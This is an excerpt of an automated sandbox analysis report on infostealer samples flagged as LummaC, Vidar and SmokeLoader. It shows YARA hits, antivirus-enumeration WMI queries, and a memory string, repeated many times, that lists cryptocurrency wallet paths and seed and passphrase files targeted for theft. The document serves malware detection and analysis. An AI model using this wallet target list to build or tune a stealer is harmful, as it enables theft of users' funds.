                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: 21AE.exe, 00000005.00000002.2691748524.000000000081F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.000000000081F000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000978000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected CryptOne packer
                  Source: Yara matchFile source: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: Process Memory Space: 21AE.exe PID: 5640, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected SmokeLoader
                  Source: Yara matchFile source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected Vidar
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 12.2.C9A7.exe.42a7719.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.C9A7.exe.2590000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.C9A7.exe.2590000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.C9A7.exe.44d0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.C9A7.exe.44d0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.C9A7.exe.42a7719.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: C9A7.exe PID: 3944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: katA304.tmp PID: 1436, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                  Source: 21AE.exe, 00000005.00000003.2493723508.000000000088F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: 21AE.exe, 00000005.00000003.2493723508.000000000088F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Opens network shares
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: \\config\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpFile opened: \\config\Jump to behavior
                  Tries to harvest and steal Bitcoin Wallet information
